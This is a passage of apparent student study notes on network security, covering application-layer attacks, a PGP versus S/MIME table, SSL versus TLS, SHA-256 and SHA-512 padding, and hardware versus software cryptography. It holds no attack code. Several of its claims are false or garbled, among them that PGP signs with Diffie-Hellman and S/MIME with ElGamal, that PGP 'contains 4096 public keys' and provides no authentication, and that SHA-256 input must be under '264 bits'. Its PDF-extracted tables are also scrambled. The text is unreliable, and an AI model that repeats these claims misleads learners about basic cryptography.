only contain digits that are easy to process. Domain Name System (DNS) is a protocol that
provides the translation between hostnames and IP addresses.

Application layer security

As mentioned in the previous sections, the application layer is the closest to the user.
Therefore, it is very dangerous if it’s to be attacked. In such a situation, performance may be
degraded, data integrity may be compromised, user’s data stolen may be, or the network may
break down.
Some application layer attacks include:

 SQL injections
 denial of service attacks
 cross-site scripting
 access to unauthorized data

Page | 40
  parameter tampering

Mitigation of attacks

There should be security present at the application layer to ensure that attacks can be
successfully be defended against.

Some methods to avoid these attacks are:

 develop DDoS prevention and response plans

 invest in web application firewalls
 secure the network infrastructure

Difference between PGP and S/MIME

S.NO PGP S/MIME

It is designed for processing While it is designed to process email as well as

1.
the plain texts many multimedia files.

PGP is less costly as

2. While S/MIME is comparatively expensive.
compared to S/MIME.

PGP is good for personal as

3. While it is good for industrial use.
well as office use.

PGP is less efficient than

4. While it is more efficient than PGP.
S/MIME.

It depends on user key Whereas it relies on a hierarchically valid

5.
exchange. certificate for key exchange.

PGP is comparatively less While it is more convenient than PGP due to the
6.
convenient. secure transformation of all the applications.

PGP contains 4096 public

7. While it contains only 1024 public keys.
keys.

PGP is the standard for strong While it is also the standard for strong encryption
8.
encryption. but has some drawbacks.

While it is not used in VPNs, it is only used in

9. PGP is also be used in VPNs.
email services.

Page | 41
S.NO PGP S/MIME

PGP uses Diffie hellman

10. While it uses Elgamal digital signature.
digital signature.

In PGP Trust is established In S/MIME Trust is established using Public Key

11.
using Web of Trust. Infrastructure.

PGP doen’t provides

12. S/MIME provides authentication.
authentication.

PGP is used for Securing S/MIME is used for Securing Messages and
13.
text messages only. attachments.

Their is less use of PGP in

14. While S/MIME is widely used in industry.
industry .

15. Convenience of PGP is low. Convenience of S/MIME is High.

Administrative overhead of
16. Administrative overhead of S/MIME is low.
PGP is high.

7. Type of cryptography. What is security at transport layer SSL and TLS? What is
SHA-256 and SHA-512? What is cryptography implementation?

Answer- Cryptography is the study of securing communications from outside

observers. Encryption algorithms take the original message, or plaintext, and converts it
into ciphertext, which is not understandable. The key allows the user to decrypt the message,
thus ensuring on they can read the message. The strength of the randomness of
an encryption is also studied, which makes it harder for anyone to guess the key or input of
the algorithm. Cryptography is how we can achieve more secure and robust connections to
elevate our privacy. Advancements in cryptography makes it harder to break encryptions so
that encrypted files, folders, or network connections are only accessible to authorized users.

Cryptography focuses on four different objectives:

1. Confidentiality: Confidentiality ensures that only the intended recipient can decrypt
the message and read its contents.
2. Non-repudiation: Non-repudiation means the sender of the message cannot
backtrack in the future and deny their reasons for sending or creating the message.
3. Integrity: Integrity focuses on the ability to be certain that the information contained
within the message cannot be modified while in storage or transit.

Page | 42
 4. Authenticity: Authenticity ensures the sender and recipient can verify each other’s
identities and the destination of the message.
5. There are some differences between SSL and TLS which are given below:

SSL TLS

SSL stands for Secure Socket Layer. TLS stands for Transport Layer Security.

SSL (Secure Socket Layer) supports TLS (Transport Layer Security) does not
the Fortezza algorithm. support the Fortezza algorithm.

SSL (Secure Socket Layer) is the 3.0 TLS (Transport Layer Security) is the 1.0
version. version.

In TLS(Transport Layer Security), a Pseudo-

In SSL( Secure Socket Layer), the Message
random function is used to create a master
digest is used to create a master secret.
secret.

In TLS(Transport Layer Security), Hashed

In SSL( Secure Socket Layer), the Message
Message Authentication Code protocol is
Authentication Code protocol is used.
used.

SSL (Secure Socket Layer) is more

complex than TLS(Transport Layer TLS (Transport Layer Security) is simple.
Security).

SSL (Secure Socket Layer) is less secured

TLS (Transport Layer Security) provides
as compared to TLS(Transport Layer
high security.
Security).

TLS is highly reliable and upgraded. It

SSL is less reliable and slower.
provides less latency.

SSL has been depreciated. TLS is still widely used.

TLS uses protocol to set up implicit

SSL uses port to set up explicit connection.
connection.

What is SHA 256?

Page | 43
There are two families of hash functions, SHA-1 and SHA-2. The SHA 256 belongs to the
SHA-2 family of hashes. SHA-1 is a cryptographic hash function that was designed around
1995 and was disapproved for cryptographic usage after 2010.SHA 256 is a hashing
algorithm that was published in 2001 when the SHA-1 was losing its strength against brute
force attacks. The hashing algorithm was a joint effort between National Security Agency and
NIST.

The number 256 has a unique significance in its functionality. The number signifies the
length of the final hash value or digest. It means that no matter how big the plain text is, the
hash algorithm will always produce a 256-bit hash value.

Here are some key characteristics of the SHA 256 algorithm!

1. The length of the message, cleartext, or plaintext should be less than 264 bits. Yes, the
message can be of any length, but for random hash values, it should be in the
comparison area.
2. The digest length or the final hashed value should be 256 bits.
3. All the 256-bit hash algorithms should be irreversible. It means that the plaintext
should not be retrievable if the digest is available or vice versa.

Padding bits

The padding bits are a concept in hashing where additional bits like 0 or 1 are added to
complete the block. Let me explain!

The cryptographic algorithm manages the input provided by you in blocks. Hence, if the
block is 512 bits and there are five more bits left to complete the entire message apart from
the last 64 bits, five padding bits will be added to it. These bits will be 1,0,0,0,0.

What is SHA 512?

Just like SHA 256, SHA 512 also belongs to the family of the SHA-2 family of hashes.
Though it is not as widely used as SHA 256, it is also a powerful hashing algorithm.

The characteristics of SHA 512 are almost similar to SHA 256, with the difference of the
following!

1. The length of the produced hash or digest is 512 bits.

2. The input message is broken down into block sizes that will be in multiples of 1024
bits.
3. The message should be irreversible. The plaintext should not be retrievable if the
digest is available or vice versa.

Page | 44
Other than this, the padding bits work in the same way as in SHA 256. The block size is
1024. If there are seven bits left other than 128 bits to complete the input or the next multiple
of 1024, padding bits should be added to complete the input. The padding bits would be
1,0,0,0,0,0,0.

What is cryptography implementation?

Modern cryptographic algorithms can be implemented using dedicated cryptographic

hardware or software running on general-purpose hardware. For various reasons, dedicated
cryptographic hardware provides a better solution for most applications. Table 1 shows a list
of reasons hardware-based cryptographic solutions are more desirable.

Table 1. Hardware vs. Software Cryptography Comparison

Hardware-Based Cryptography Software-Based Cryptography

1. Uses dedicated hardware thus much 1. Uses shared hardware thus slower to
faster to execute. execute.

2. Not dependent on the operating system. 2. Dependent on the security levels and
Supported by dedicated software for features of the operating system and
operating the hardware. supported software.

3. Can use factory provisioning and 3. No dedicated secure memory locations

securely store keys and other data in available. Thus, susceptible to stealing or
dedicated secure memory locations. manipulation of keys and data.

4. Maxim's hardware implementations 4. Software implementations can be easier

have protections built in against reverse to reverse engineer.
engineering such as PUF (ChipDNA).

5. In a hardware system, special care is 5. In a general-purpose system where

taken to hide and protect the vital
information such as private keys to make it
much more difficult to access.
software cryptography is implemented,
there are more ways to snoop and access to
vital information. An example would be
intercepting the private key in transit
within the computer's system.

Page | 45
Page | 46